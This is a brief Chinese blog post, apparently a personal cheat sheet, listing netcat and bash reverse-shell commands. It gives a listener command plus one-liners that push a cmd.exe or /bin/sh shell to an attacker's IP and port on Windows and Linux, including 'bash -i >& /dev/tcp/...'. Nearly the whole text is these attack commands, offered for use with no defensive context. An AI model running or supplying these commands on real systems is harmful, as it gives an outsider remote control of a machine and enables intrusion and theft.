美文网首页
nc 反弹端口命令

nc 反弹端口命令

作者: migrate_ | 来源:发表于2019-06-18 15:06 被阅读0次
    1. win下
    win
    自己   nc -vv -l -p 22
    shell  nc -e cmd.exe 1.0.0.1 22
    
    1. linux
    linux
    自己   nc -vv -l -p 22
    shell  nc x.x.x.x 22 -e /bin/sh
    
    1. 发行版linux
    远程:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
    本地nc指令:nc -v -l -p 自己的端口
    

    相关文章

      网友评论

          本文标题:nc 反弹端口命令

          本文链接:https://www.haomeiwen.com/subject/kfyfqctx.html